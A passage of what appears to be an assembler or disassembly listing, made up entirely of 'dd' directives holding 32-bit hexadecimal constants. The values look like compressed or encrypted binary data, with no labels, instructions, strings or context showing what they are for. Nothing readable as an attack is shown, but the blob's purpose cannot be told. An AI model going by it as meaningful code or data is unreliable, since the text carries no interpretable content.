		dd 0E7D36A3Ah, 0BF406F7Ah, 30379024h, 8F91DC36h, 0AE67D28Eh
		dd 0D5D8D96Bh, 3670778h, 41150AA3h, 13593F2Bh, 376C5402h
		dd 63177485h, 0E898DFA6h, 7F65D877h, 100C2DE6h,	2A2F0FD2h
		dd 845A1803h, 0D8C48031h, 0C7FE53h, 60352D08h, 860281AFh
		dd 1353CC02h, 0D339A604h, 0F4DE34F7h, 5AA46C5Dh, 21AB0637h
		dd 721579D7h, 0A1D5A46Ah, 8D2284E2h, 96025309h,	6AA23C50h
		dd 3CC3FBE7h, 4F2732B1h, 0AC2DE9A0h, 0CBC472DBh, 55154316h
		dd 0B298686Bh, 0A10936E0h, 6D3DD69Bh, 91CB2978h, 4BA07215h
		dd 76D8860Bh, 8FE9FEACh, 14D24F1Ah, 0CD4DE8ADh,	8A8FD056h
		dd 0E7C4A49Ch, 4E4A9D5Dh, 60821208h, 0C5B958A0h, 8B4E5478h
		dd 48121305h, 22434A1Ch, 20A5DE39h, 11258246h, 0B1E981B2h
		dd 2A02260Fh, 8D9205D2h, 0DFB79405h, 822D0D0Fh,	4C44E1EBh
		dd 40BA0F66h, 2C80155h,	600E903h, 27A313EEh, 0B5FEF808h
		dd 599613BEh, 0BEFD297Ch, 4889B9C3h, 5AE78C1Fh,	68EE6ED3h
		dd 0CEC5196Ch, 0A1712A4Dh, 0E298FE2Eh, 4985DB75h, 0F956A425h
		dd 0D3FC222Bh, 0A50A1AFFh, 3C2F2058h, 820298BEh, 8E378775h
		dd 0C4F7E710h, 0A6AB6AE6h, 7F83B9FFh, 0B351F3D1h, 666A0353h
		dd 0EE445ECh, 87E04A13h, 29F55FDh, 82A6F833h, 9F699CAh
		dd 9281605Ch, 1D4E83F0h, 31B8C622h, 95F1F5F3h, 0DC4F50EAh
		dd 0A4ABA8C3h, 0CBA50F99h, 1EEC311Dh, 1393155h,	0A08A5F3Bh
		dd 0D8069818h, 27286770h, 952671A0h, 30631EB9h,	7CEBCC09h
		dd 56A744A7h, 0FC7AAFD2h, 5A24E1D1h, 5828E3EEh,	9C299116h
		dd 423B3980h, 2C378841h, 0D82EEA90h, 0FB5A097Dh, 0C92DA479h
		dd 54B30E18h, 0E823CBB1h, 52DF3AF3h, 50C10A2Ah,	0DC205C4Bh
		dd 0DC2D44ACh, 0CE22DC08h, 0BBC0279Eh, 0EC00262Eh, 24AF9594h
		dd 19ED61E5h, 1D5AFC42h, 0ABA2BAF4h, 0E50B64A9h, 752A4263h
		dd 0A45E7EDh, 844AB1B0h, 0C56E29BCh, 880E6050h,	0D0D85F18h
		dd 4C01D5E1h, 51A0A054h, 0FAF6C58Bh, 15C7CDE0h,	3F1E2E95h
		dd 0BC19A1F6h, 0F505C34Dh, 30BEB682h, 78A07649h, 8B13C1C1h
		dd 6BACC851h, 91778A9h,	0CE167E72h, 412448D0h, 59981922h
		dd 638333E2h, 9AA65761h, 0C891EB89h, 0A0CDF315h, 0B2B941BAh
		dd 22AD3532h, 0CCB2215Fh, 0DB5804D0h, 609C1204h, 809AAA94h
		dd 1596177Dh, 18A8CA07h, 80B2E237h, 52AE1E13h, 1B38C1E7h
		dd 0BA0BA6E3h, 0FA2EA62h, 38FA2DD9h, 0BD0EA12h,	5D1CD5D8h
		dd 635D65EDh, 0D6DDEA0Ah, 0C55F1225h, 4F0D5B03h, 3B371EAEh
		dd 1277FC13h, 0ADA52A01h, 0C8971010h, 1830AA4Bh, 683EB129h
		dd 5D57C6EEh, 20EBB006h, 49F4E42h, 0C65381D7h, 1B2B4607h
		dd 0E0B428BBh, 81FCF887h, 9B948233h, 3DCE9101h,	0C5747F07h
		dd 0C1CF3EA6h, 87988B05h, 57AB3AC8h, 8020A04Ah,	604AEA78h
		dd 0CA6DABF4h, 9F3356FEh, 619615E0h, 1729E18Eh,	4BFF6021h
		dd 749757CFh, 0C8629265h, 0A07AA190h, 49C2F8FBh, 3C0BC1FAh
		dd 8064C969h, 2F28391Ch
		dd 3768C2EEh, 433800E6h, 28F1040h, 630044E4h, 0E8E2D004h
		dd 883A6B23h, 85A8A0D8h, 6204EF3Fh, 0B48E500h, 3E342C05h
		dd 0D20B7BD8h, 166E0CA0h, 1826D731h, 9141598Bh,	20510A16h
		dd 8B641081h, 6C0134Ch,	1D941890h, 2191922Dh, 80EE03D6h
		dd 700914CDh, 0B8252004h, 0C0955E12h, 5D13684Ah, 0C495612Ch
		dd 21F1DE4h, 6F7BC795h,	0B010412Ch, 7408E097h, 0E8914AA4h
		dd 915410Bh, 915C54BFh,	5CCD4BF8h, 0FE046C11h, 0DB6288C0h
		dd 0AA6FFF0Ch, 9097CCB7h, 0CCB10047h, 0B20D7127h, 18A3FE7Ah
		dd 94F448Ch, 0A0967F63h, 518BF704h, 74988030h, 0EE39131Bh
		dd 9222FF17h, 6890485Eh, 721F47A1h, 0A05FDFEBh,	0FD95C1E1h
		dd 85ED113Eh, 49451AAFh, 4B92BC19h, 1C953F30h, 944BA87Ah
		dd 5B64A928h, 6378DA30h, 2432A80h, 50FC011Dh, 1E4F7103h
		dd 0C85A1C05h, 44D97287h, 34E23D66h, 0A56732DFh, 168A3124h
		dd 0F5211D32h, 0C55D419Eh, 8E6C9B10h, 4E919062h, 0E206294Bh
		dd 9676EE02h, 9A038144h, 0F4682ACBh, 2302E39h, 86004BF8h
		dd 28E2403Dh, 0A6E98C51h, 47125244h, 318428D9h,	14482A04h
		dd 48A8AA5h, 48AAAA51h,	8AA5A50Ch, 0AA935084h, 49950448h
		dd 0AC009E28h, 22840019h, 79AE8DA1h, 948C949Ch,	0D48806B6h
		dd 14527810h, 0F36EF185h, 89DFF367h, 57BA55B0h,	0F0F42EADh
		dd 0EEEE0FC5h, 9ACA50DFh, 3D8BAEE4h, 98ABBF14h,	4EFE2DEBh
		dd 2622E944h, 0B2757758h, 5423277h, 0B8776B9Ah,	3EEBA34Eh
		dd 82B1481Dh, 5772F30Eh, 3FB005Ch, 0AD7201EEh, 2AD5794Ah
		dd 0BB328FE9h, 0AC9ECB6Ah, 0C83ED59Bh, 7DD57305h, 0C7818274h
		dd 1BD10CCFh, 67640C6Eh, 40D53AFFh, 0FA90CC2Ah,	2EBC40F1h
		dd 1E01C5FCh, 0F1D9955Fh, 270E0355h, 33C34119h,	0BD6E41FFh
		dd 0A2C2C90h, 79E8454Eh, 0B1A3FECEh, 496A408Ch,	110B19A3h
		dd 0AE6EAA2Bh, 7C9AA325h, 0EB15153h, 1DA52AFCh,	28A22815h
		dd 0A1285414h, 467F3E67h, 15DAA9B9h, 0AF1A477Dh, 414A84A4h
		dd 0B27E3FAh, 13CAECFEh, 4E450CE6h, 3CA8BAD7h, 7884AD05h
		dd 8293A782h, 0B67A183Eh, 47886C8h, 2F798159h, 9F2AAD40h
		dd 0C3028FBCh, 0B441E129h, 0CC5275D4h, 0B021EC77h, 41270C24h
		dd 8B979E3h, 0CBBD6169h, 0B2B17BEBh, 0E0A4FECFh, 0B8EE0F5Fh
		dd 2C40873Bh, 5EBA7FFAh, 2CAA432Eh, 0CE55F2C6h,	9556B219h
		dd 58E8F2CDh, 6854356h,	0C9DFAC05h, 0DA7DFD10h,	0BCAA1AE9h
		dd 0CC6F62BAh, 9A87B3D2h, 0B78BB939h, 848415D3h, 0E7B7F47h
		dd 0AEC90796h, 0D004B4FEh, 422A146Ah, 0B6E4BB2h, 23C0E195h
		dd 0AEDA0C05h, 202CABFBh, 2C123F1Eh, 2A4A2DDCh,	452A79EDh
		dd 9B6D6D95h, 0AA9E4B44h, 88074004h, 1B7FBB7Dh,	0D9DF1C5Fh
		dd 7387D801h, 0A7DE1EB3h, 1A4FA801h, 6ECAE5F1h,	48DDC2ABh
		dd 99AD4797h, 0BC27A00Ah, 6A689F53h, 0D1690277h, 0A4E51697h
		dd 7585A912h, 28CD16D4h, 112DA6E1h, 3D448276h, 621A7893h
		dd 10AB8A51h, 0D68E2E80h, 32CBD715h, 0AA34BAA3h, 0D655158Bh
		dd 9B3C201Bh, 0EDA67E5Ch, 9BE98B60h, 37162093h,	14E55B94h
		dd 4E1E0805h, 0A2114F73h, 371BF55h, 8EC6E36Bh, 1140FC6Dh
		dd 1645D66Dh, 16D4286h,	6922157Bh, 312D060Ch, 7628084Ah
		dd 0AD9E0ACAh, 0F40FEA9Eh, 0EB02B334h, 0DD78D743h, 434EACABh
		dd 91014555h, 9E40CFF2h, 83D41602h, 3E394249h, 4AEA268Fh
		dd 0A68BD77Ah, 0CDCA9229h, 809180D1h, 891B254Fh, 2C72826h
		dd 0E7F43089h, 99BB25FEh, 140D13Ch, 1E9246ABh, 414E5D48h
		dd 0E4522149h, 438BCA4Bh, 0A0780D1Dh, 85E916AAh, 2ABEB375h
		dd 0BB795D2Dh, 5E482E23h, 0A8721165h, 0F48A173Dh, 1D5F2905h
		dd 0C1FEE158h, 298F17F9h, 63C2A097h, 0F257DFB2h, 0D95D794Ah
		dd 58B5D155h, 0C1F0B17Fh, 70B0E391h, 824D421Fh,	806301D8h
		dd 82C56478h, 0B165D3F3h, 41EA723Ah, 0FB2A8531h, 8B542975h
		dd 403CECC0h, 0BE924AABh, 384CBD00h, 14925832h,	3048E279h
		dd 1A66274Eh, 9520D34Ch, 8023E304h, 0BD00056Eh,	0AF22982Ah
		dd 2F40E92Ah, 0C222A0BDh, 32F47D2Ah, 5D42A342h,	946C0692h
		dd 2238C8h, 0C6090761h,	5E8E452Fh, 0C7520F82h, 0C155FFFBh
		dd 0BCF7021Eh, 6DBE80Fh, 0BD5204DFh, 34841665h,	57A07802h
		dd 4D8BAB85h, 18441DDAh, 71354D38h, 91825AE0h, 0D403B886h
		dd 8C8DB21h, 402A1FC0h,	0C9A70F2Fh, 8E9249BCh, 2E0B0308h
		dd 3A4C852h, 8F8C1AF4h,	76B270h, 2512B95Dh, 944BF802h
		dd 912DC625h, 0E8053896h, 933AB955h, 0D8017E50h, 0EFFD0033h
		dd 195E1F47h, 0C544E5A8h, 2D0E8057h, 7102A092h,	0A9B24717h
		dd 3E05A73Eh, 0BB804BF4h, 0A40A74D8h, 308B2AAFh, 0F5624467h
		dd 517FACB1h, 0DD4CC294h, 55DF1A31h, 40D56402h,	0B7B706C5h
		dd 43D7B4B7h, 0F7BCD8A7h, 941CC516h, 9177A577h,	772457E9h
		dd 76053565h, 9797DA78h, 224C3A80h, 4924286h, 435166C2h
		dd 0A205535Eh, 0F20EDE0Fh, 56223FEFh, 0D441C641h, 0A70840Ch
		dd 61BEFCDAh, 2B08A03h,	8D959282h, 30654190h, 8440E8F8h
		dd 48C66026h, 0AEE7AA57h, 1E702A04h, 1ABD601Fh,	8122A42Ch
		dd 0D8B0C060h, 2E72692Ch, 4E2A6518h, 98815C64h,	0F395BD0h
		dd 0CDC17AF1h, 0F350DA33h, 0D16370FFh, 9A4C1E5Dh, 1752A1EBh
		dd 5DC505C6h, 142A921Ch, 84804292h, 0AD51098Ah,	0D60E2E55h
		dd 0A7AE4AF5h, 0E35FBB79h, 0CAE80D3Bh, 0D4A04E62h, 6721C1AAh
		dd 4656CB67h, 9758CA4Bh, 55B1FE08h, 2B3F026h, 0CA90335Fh
		dd 69718330h, 0F4B75B54h, 0EB3FD499h, 6C4C22C5h, 0E0CA105h
		dd 0EC0F31ABh, 0ECAF81B9h, 57FAE5D4h, 36049EABh, 0BFD6BC11h
		dd 1FB5AAF8h, 6780FCFh,	285AFFE5h, 3904EB1h, 9684088Ch
		dd 808B7778h, 62662E76h, 420F7581h, 94B921FBh, 0CC284394h
		dd 717CD5F5h, 702A7676h, 0FA504F5h, 0C06C54B2h,	0ADC5926Eh
		dd 8365977Eh, 22F300E6h, 0ECDDD61Bh, 0B383DD80h, 0DFA5E212h
		dd 0EB001AAEh, 7177417Ah, 2FC7B240h, 0AACD1918h, 0E0283228h
		dd 8DE6C30Fh, 5831C218h, 0B43252D4h, 3F3218BCh,	7AEB92A0h
		dd 87499604h, 0C7C357B6h, 66778F12h, 0D4E51158h, 0F087BE45h
		dd 17D0033h, 4174C3D7h,	0A0D36672h, 79C9FD62h, 5961CB09h
		dd 58FA5B91h, 6F8A5BB9h, 9AAAEAD4h, 8B0CAD08h, 0F97AE71Eh
		dd 29BF80ACh, 0BD8DD657h, 2612C5D6h, 0C08142C1h, 0F268BE41h
		dd 389D0299h, 4F933461h, 0BBA570DFh, 0DFAB7209h, 3BE5D9E2h
		dd 0AD27F7F5h, 75098244h, 0BB04D0F8h, 0EB3B9344h, 0C16D2629h
		dd 46AD105h, 8E5EF0E2h,	70209155h, 3390EE94h, 96C272Eh
		dd 0D17D0149h, 0C94E396Bh, 87E1BAF9h, 6D4D5ABCh, 6F07AC1h
		dd 0F9A8644h, 26ABF2F9h, 3FB59B7Ch, 80B60C02h, 1B0415DEh
		dd 0F8228C44h, 7D81F09Ch, 49559640h, 0C1FE2195h, 7F06ED3h
		dd 2C037DB7h, 0BE12D650h, 658C0290h, 0E8208270h, 62BDCDD6h
		dd 8BAB3206h, 0BB4C7726h, 0D16B31DAh, 28A91432h, 6F39A4C1h
		dd 657798D9h, 4227DC1h,	448484A1h, 229B1C9h, 0F437DF54h
		dd 0D97F41D1h, 0FABE3AC0h, 53A19FFDh, 5696494h,	7F18EF35h
		dd 8C67283Eh, 23184524h, 0D7AE4470h, 0F107AFC6h, 49D82608h
		dd 1C410A0Eh, 6AB3382Bh, 782043E6h, 0A5DD9AF0h,	1C0C1F0Bh
		dd 0F2B4A35h, 54432D19h, 0F0ADBB88h, 3B00DEAEh,	0C02875B2h
		dd 0D0FB968Ch, 0D243AF52h, 0A259BB1h, 82F90142h, 68184460h
		dd 42343BB4h, 0F5A37768h
		dd 45900908h, 4048589Eh, 4E2383A3h, 4B06B3A2h, 2E02C563h
		dd 0F495EA08h, 583802BAh, 0F0A88D55h, 367655D2h, 780B09ACh
		dd 48140E2Fh, 7FE0A9C7h, 57FB600Eh, 556BBE8Ch, 0BD26D9CFh
		dd 0D6206290h, 297C0Bh,	0C8E08523h, 155B0800h, 462D2244h
		dd 0FC6D152Dh, 4CC21885h, 0EAD53B6h, 0F83AFE37h, 159E4E8Bh
		dd 0C0A9CAEFh, 0F05A09DBh, 0B50D0FC6h, 13980273h, 0A18BC136h
		dd 0C6D4C5D2h, 1C6D7D34h, 0B2A12EB4h, 0C4801BFAh, 76F910BBh
		dd 4C6B81C0h, 0C9FFD65Dh, 175E26C5h, 2DCC9A6Ch,	2C3E00A9h
		dd 0E852021Eh, 0F9B4038Ah, 0BCCEA00Bh, 56C528DEh, 40AD2FF0h
		dd 0FCB5C1F3h, 55625385h, 0E0CBC868h, 86F66090h, 94A881F1h
		dd 2F4B8CBFh, 0A03F3A0Eh, 6319F954h, 0C5D6DD62h, 0E1FF067Fh
		dd 660B0DF8h, 0B33C5C60h, 336E39B4h, 0DDD213C8h, 0B2C8D3BFh
		dd 18A24FEh, 0F0145218h, 0E9F10411h, 0B00A8E60h, 0EE2C0FFAh
		dd 1E28DABBh, 0C048F2B0h, 0F15415CAh, 0B2ADABA2h, 0FF23923Ah
		dd 95421454h, 0D063155Ah, 0C00AA24Ah, 0E78E18ABh, 0CB493BECh
		dd 4B267F86h, 0AAD5578h, 38C9056Bh, 789F4C93h, 49D87B83h
		dd 0D7EE257h, 86F88CDh,	97638092h, 295CE576h, 842D4E15h
		dd 77BD98Ah, 0BAF349DBh, 16C558C8h, 0FA31FDBh, 7306D0E1h
		dd 9DFAC51Ch, 4C7C60D4h, 94E0F616h, 0E0F41457h,	4541230Ah
		dd 53DBAEA1h, 0BA4C28EFh, 957680A2h, 0BE1DE7Ah,	4E349C39h
		dd 0D1B1A255h, 645F0BBh, 0FDCA4880h, 0B63D177Eh, 6E15E849h
		dd 0A7CA8981h, 0CA7FAFE7h, 0E0066022h, 9431F718h, 0AD1A4610h
		dd 53C54B3Fh, 98B03791h, 7F1AAFE3h, 3A35ADD2h, 22F8685h
		dd 893EB5FFh, 28D4513Fh, 0F2420A83h, 3CCF703Dh,	12CF040Dh
		dd 0A37E758Ah, 51559E75h, 26BAA0C5h, 0BAF2FA6Ah, 0A8ABE54Ch
		dd 0CC33B152h, 402290F8h, 0DB01FB84h, 0C042175Dh, 0DAAB4556h
		dd 0BBD5574Bh, 556E732Ch, 85C3290Fh, 165FA715h,	42AF0B69h
		dd 75A7F7BFh, 0F8D9F085h, 0D8AA54EAh, 0F23BE617h, 2BAC1653h
		dd 0EE66B730h, 130782A6h, 0C6D16567h, 6C345864h, 920D955Ah
		dd 88C0594Eh, 17ED5801h, 0AAE50641h, 275E927Eh,	904CC13Eh
		dd 190203C2h, 0AC2E0D3Ah, 740788AAh, 8043702Bh,	0E4F1D6FFh
		dd 0B4EA06FFh, 0C3327493h, 195D432Ch, 3036F101h, 0CF73F1CDh
		dd 188C6513h, 9803B82Ah, 11590DC4h, 55520C36h, 756A0BCBh
		dd 603FD1A8h, 0CA2BC596h, 0E5AA8EF0h, 415EBD3Eh, 0ECE5504Eh
		dd 0DF1E10ACh, 5C7BB7C9h, 80961F84h, 0A401B46Bh, 208A266Bh
		dd 0AE539C6Eh, 0F029B37h, 38C6A0h, 89BCFA11h, 48447E15h
		dd 0A7101942h, 6FD20424h, 80159315h, 0A2250E0h,	0D3B3B81Eh
		dd 0BCE1B4E9h, 0AA284E6Fh, 55BE28FEh, 38C6A740h, 2149405Dh
		dd 98BFD61Dh, 7E2FDAF7h, 5529E2F2h, 0AEA49025h,	0D07C0A37h
		dd 4DC6D0A8h, 0AD02F0F1h, 1C15C336h, 418DD01Ch,	2349A0D2h
		dd 0FFA0C834h, 592191E5h, 0D223CC01h, 340B4685h, 75A881E1h
		dd 0E87517B9h, 0DEB8D399h, 0ADF5F34h, 0C2FF362Ch, 5568DBCCh
		dd 0ABC7CD5Bh, 12A35A10h, 0BB815559h, 0AC228A81h, 5800252Ch
		dd 1FF1EB0Bh, 4F1F8AD1h, 0A719D6BAh, 0F3474780h, 6944715Eh
		dd 0BC24ED7Fh, 0D2440E68h, 310AC1CAh, 75A21831h, 31CE530Eh
		dd 0EB419784h, 94CA959Dh, 7C0B5ED3h, 556F0A51h,	0F3260705h
		dd 8BF928CDh, 0D441B3F1h, 0CA548854h, 3A63E0CBh, 0A7A2D5Dh
		dd 61287804h, 7B6BEE5Ch, 0DAB0C0E1h, 8BE1D607h,	56DC7A15h
		dd 0FAA9D217h, 49741B20h, 605411Ch, 4327790Dh, 9C5A0D5Ch
		dd 0D0ABF576h, 231068B0h, 2501D0E8h, 83902BAAh,	40B67587h
		dd 0CB973386h, 494210D2h, 5C7849BBh, 334DD814h,	1C3F33C8h
		dd 2929FB8h, 0B0B01967h, 5B1C4A6Eh, 0E8015312h,	45D388ABh
		dd 9715DF54h, 582C2479h, 5E22EE35h, 3E55575Ch, 689C0BA3h
		dd 23D2D58Dh, 0FD01F157h, 0E2359A5Fh, 0A055D0B7h, 0E7E161F6h
		dd 72380E3Ah, 0C576FE6Bh, 0FC5D0592h, 0C1C75C17h, 80950284h
		dd 312DC61h, 0A1A55EBCh, 0C2EC38C7h, 585300EEh,	73E92497h
		dd 7A8EE43h, 0EF198E1Ch, 528A96ECh, 74B0499Ch, 1A895074h
		dd 6086CACFh, 99373070h, 527555DAh, 159007DAh, 0A2FF5181h
		dd 3F0B23A8h, 26945F4Ah, 8ABEFE4Fh, 0ABD5DC80h,	0AEBA073Ch
		dd 5F2189B1h, 776BB934h, 29D70556h, 66289484h, 737B7CD8h
		dd 572017D6h, 171BD7C9h, 0A7034FCCh, 5F0C1C26h,	14C7C1Ah
		dd 0F78BBF0h, 0DFAB98C1h, 3D6A5B94h, 0C62E7A51h, 6A28FACFh
		dd 0CAF507F6h, 218B1321h, 0EB87CB6Ch, 94DFA0FDh, 439BB41Eh
		dd 0FBD122A7h, 8A531B1Ah, 30E25A12h, 58336B2Ah,	0A69FBE66h
		dd 0EC2631E2h, 839F4252h, 0F68455BCh, 520C67DFh, 0B2C1CDE5h
		dd 72EDF274h, 0A90C5E5Fh, 73382D5h, 0FCA80786h,	0ECDAED96h
		dd 1390F64Fh, 982B9842h, 0FE1C5452h, 86AA3E95h,	282C1025h
		dd 68EA0BAFh, 3C37AEDFh, 0BC99044h, 0FE8709Ch, 0F5C183FEh
		dd 1939981Bh, 0F872D5F0h, 0C3287FFAh, 583FBF47h, 5D61AABCh
		dd 0B29EF2AEh, 7AC52215h, 97CDD65Fh, 0B0B33639h, 9403CA0Ah
		dd 44653D42h, 0A1CAD145h, 73CF0945h, 0AA29730Bh, 79FF66B5h
		dd 7D4B68F4h, 0B2E6DF4Bh, 9DC5B2D7h, 0E27DC01h,	0D270CDE5h
		dd 0C2E69834h, 0AB54EBCAh, 7A67F219h, 2EF6172Fh, 87C5D2A1h
		dd 0CFB7F0B9h, 25F32910h, 22EB041Fh, 0C4D89AACh, 0F66A116Dh
		dd 1477FED7h, 0AA52A3C5h, 5F3AA32Eh, 0DE29145h,	0FE1487Bh
		dd 0D9ABE55h, 37AFB83Bh, 23C19DFAh, 169908D2h, 6A5102F1h
		dd 8760B438h, 2A539B3h,	558AC462h, 0ECED3574h, 3C040EE2h
		dd 4BEA8B92h, 0A4B4EA0Ah, 0E42F7878h, 2ABABACAh, 18C48175h
		dd 0E839F50h, 29861555h, 4FD73D80h, 0BC5D010Fh,	28B94152h
		dd 0CE8FC502h, 0D0C79B90h, 0F621A7D5h, 0AFD3CD8Bh, 598C7C9Bh
		dd 0F80EFF3h, 206F2B64h, 0E8DC89A2h, 0B0A1CD03h, 0CC1A1D3h
		dd 8DDABBC2h, 1347CC85h, 2883034Eh, 0BE2A5D10h,	4198CDA3h
		dd 0A629D75Ah, 54177AAAh, 15426A81h, 791D527Dh,	17EE6656h
		dd 8EE9F156h, 0F90E3AAFh, 0AD15365Fh, 885B9BBAh, 9212D0FAh
		dd 0C0E731Dh, 0E1FBE9D4h, 825E8C99h, 0B854FF4Ah, 1A02138h
		dd 9FA93F6Dh, 0B937E24Bh, 6ABA2EECh, 7B820953h,	0DB201071h
		dd 0C4B2D9FAh, 1C35C1FEh, 0C4D41C11h, 12C3BE68h, 20D76E55h
		dd 0E405CAFDh, 3BE9446Fh, 0C4E1EC4h, 533E0BCAh,	4819EF64h
		dd 5D60DABFh, 0A85D8025h, 6023428Bh, 0A1D84951h, 5E95D8A4h
		dd 0E0610305h, 0DE003695h, 0FE2375Dh, 7F9C6691h, 0EFE7FF8Bh
		dd 2FFD0ADCh, 145974EEh, 971D6699h, 4597E974h, 50D257E2h
		dd 0ECAFFE6Eh, 41D0FFCDh, 0CDCCC40Fh, 0FF8A5FFAh, 51126B22h
		dd 0A057FCC6h, 6D0BC5B6h, 0CA2E6B9Ch, 62A01B4Dh, 915DA2BAh
		dd 0C904EFF4h, 243CF5B6h, 14EA00CEh, 6175EFC2h,	1296D3D7h
		dd 0CCA89485h, 0A6C1BA4Ch, 0D5E11814h, 16831A5h, 8288AB69h
		dd 86526685h, 107445D7h, 0F1508E17h, 0F9305AEBh, 28E212DFh
		dd 915513F9h, 0D6621784h, 0DE76DAA2h, 0A8870A70h, 3D050033h
		dd 0BA41D00Ch, 12403CFFh, 0D4817F98h, 4F94C033h, 3713DE31h
		dd 92C70419h, 0E8BC3FB0h, 0A2B8D4C4h, 381BF87Ah, 42B1B0C0h
		dd 0C7400D9Ah, 0C76DB448h, 0B0A73D45h, 2D569B53h, 0BC8E5FEEh
		dd 9610655Eh, 1C64AAEh,	927E14A3h, 32EB1D1Ah, 0A671485h
		dd 8AA762FFh, 1F99AEF1h, 1D94C070h, 99C4B2AFh, 84017811h
		dd 0FE17D177h, 3A1E90C5h
		dd 344C5159h, 11A6BAD8h, 2E7CC43h, 8964DB0h, 1405AE94h
		dd 0A8084BA5h, 4ED02D25h, 9B215BCBh, 0C5BDBC16h, 38F958BAh
		dd 0B0572F1h, 2CC29695h, 8ABBA15Dh, 2103D6C1h, 84029688h
		dd 2469F5C5h, 33F0280h,	316A86F4h, 0CE07EB8h, 35596994h
		dd 0FBB02FB0h, 99151077h, 5646028Fh, 0A4C91A7h,	0C8601654h
		dd 45971B00h, 0FDA1F810h, 7184E05Ch, 134575E4h,	0E54E317Fh
		dd 2B432049h, 0DA8AE908h, 660038Fh, 583E8410h, 662D2A03h
		dd 1E0B5C80h, 82CCA49h,	6029A4D4h, 0C2BD65A2h, 29597B54h
		dd 0CAAA8A42h, 140E779Bh, 549292A5h, 4795B667h,	58B097D6h
		dd 14A633ECh, 4EF22981h, 0D390F517h, 610814EFh,	0BCD62E70h
		dd 4550825h, 44183E07h,	6049B769h, 216A0FACh, 277DE681h
		dd 8A02B256h, 7436802Ch, 567B897Ch, 514080Dh, 6D03F4E0h
		dd 7EA00723h, 320A2986h, 263D6836h, 0DB738410h,	395504BFh
		dd 0BBFCD031h, 6A1CE8CAh, 6B530849h, 7BA020D1h,	8D0ED25Fh
		dd 5B75CA38h, 307147F2h, 0A1A884BDh, 0ECAE8899h, 58F42201h
		dd 73CDEB11h, 0E751FA35h, 0E5C15702h, 0DD80BE83h, 0E8EA73FEh
		dd 1A391C7Ah, 314073A0h, 8770E852h, 988878D7h, 1A5F2B3Ch
		dd 5F41242Fh, 532F7950h, 37D1FA87h, 0ACBA7DEEh,	2D15B40Fh
		dd 951CFACFh, 16396869h, 0B90C5ACFh, 6F16BAEh, 238AA14Ch
		dd 785D3F6h, 39C9233Ah,	41669DA2h, 31E4E960h, 0DD11B843h
		dd 50635361h, 0CF339C50h, 66E0613Bh, 0B2A33D3Fh, 0A37FE835h
		dd 48647858h, 2BF0C6B6h, 5FFB0D3Dh, 8FB274FCh, 4965E809h
		dd 0BD1FB86h, 3CC45301h, 4EC05463h, 0C0415ADFh,	566B1DA8h
		dd 41932076h, 0C96AD4FAh, 0A8076588h, 718D4EE8h, 929659D4h
		dd 67141428h, 90819D1Dh, 1CD63705h, 6F47AEh, 0FC79CA8Ah
		dd 92EAD064h, 4A1981Fh,	3062E871h, 2383434Fh, 0CA0882D9h
		dd 2A802D14h, 1C471818h, 8D404C23h, 0DA7B14Ah, 0FA8B2939h
		dd 1A40306h, 0AFC4F2A4h, 0FD10D738h, 6174E3Eh, 0A0359BFCh
		dd 29D492E9h, 9C7F71C7h, 351E5677h, 0E162AFCEh,	0E5B7A3CCh
		dd 0D21CFFCCh, 9B98508Dh, 0BF38A3A3h, 0F8131289h, 74A4E0D8h
		dd 0CEEB8949h, 884D80A5h, 54861305h, 0D770F1F0h, 20BAC3F1h
		dd 0BDB56235h, 396CC50h, 0BE8E7969h, 19E99D2Bh,	60F4462Bh
		dd 89D2C1F8h, 82662E9Fh, 6856FA81h, 785E321Bh, 0BBE07AB9h
		dd 0C098E2Eh, 9881138Ah, 0C24B854h, 45175FA9h, 367F712Ch
		dd 54AE60A1h, 680EBDFFh, 0DF058A46h, 86DC1B17h,	0F4BF05BBh
		dd 62EB3493h, 87DFFB0Dh, 0CFA36F21h, 32BB0826h,	48B37CBh
		dd 5189214Ah, 6F61AC60h, 1E0F281Dh, 0C17238BEh,	4C86D11Ch
		dd 494FB66Dh, 0A0FBBD80h, 7902FF2Eh, 0E2001304h, 91CB160Fh
		dd 683A490Fh, 6616ED3Bh, 29FEFEC0h, 0DA7BFEE7h,	0FB1EA6FAh
		dd 0B205204Fh, 44E75907h, 1DF11719h, 0DD6028E7h, 0B9C09CFBh
		dd 178FF8DBh, 98563CF4h, 7715C9B4h, 4B01E147h, 0DD4BF160h
		dd 0D1B83EAEh, 98326C8Ah, 76FCD85Bh, 865AC83Dh,	9E4B5557h
		dd 8C27D546h, 443F6EB4h, 7E6B4AE9h, 0B4690EC0h,	0E704A627h
		dd 0F580D746h, 99B33BC1h, 0BCA28708h, 0FCA4BD0Bh, 0FD005467h
		dd 5F3D29B6h, 0B71D61DCh, 63B4428h, 0C347FE0h, 47A54985h
		dd 0AA222231h, 97AE5D7Ch, 8A34532Eh, 0C1493A12h, 5E980139h
		dd 0F288895Ah, 430810ABh, 98BFD026h, 0A170BB89h, 0EA8A8BC2h
		dd 2B37D8B6h, 0B658A549h, 37201F53h, 24079C54h,	7871CA93h
		dd 25EED710h, 8476EEC6h, 0AEDDFA60h, 0EEF002F1h, 4A388C07h
		dd 0B500E37h, 43E1056h,	0E4809753h, 34B2A449h, 55AA47Ah
		dd 5A022B42h, 0DEBE06ACh, 0F730E782h, 0BD607BB6h, 5534B73Ch
		dd 0C2B62E22h, 5599EB54h, 11E70DD9h, 4E5BB410h,	203CBA43h
		dd 28C97E90h, 14C42B01h, 625B55E1h, 0B47029A8h,	0EFC10F2Bh
		dd 0FD271B16h, 4EB665C9h, 28807FE5h, 0D0AC52FBh, 859A52E1h
		dd 0E3910293h, 0D99F394Ch, 345B7484h, 8225A645h, 53998C45h
		dd 95EC971h, 4D45AEAAh,	65D29330h, 5AE0D942h, 0CE90FBB8h
		dd 0E63DFDB8h, 645D31C1h, 33709A8Dh, 5CE029E0h,	336C2F49h
		dd 0EEAA7828h, 0E21F3C5Bh, 2B97CDC4h, 0B1CC8DC6h, 0F8402CA4h
		dd 65D63BA4h, 7AE9F83Eh, 0E10AF50Fh, 0D0066BA1h, 96356D00h
		dd 0FC317303h, 589AAFC5h, 0EEAE3550h, 4AE98927h, 668289BBh
		dd 70AA5663h, 0DBEE55C3h, 983F4CC8h, 0A7AEDB5Fh, 0D3D41F7Ch
		dd 87D00ED3h, 0FE116636h, 7396CCC0h, 2E90110Ch,	8B4A5E0Eh
		dd 51C256D2h, 0A54A1B21h, 1E9DAB58h, 937FF36Bh,	0B11765F2h
		dd 0A6F455F0h, 4CE85256h, 1D431773h, 0D1C1A1D9h, 0DF69C500h
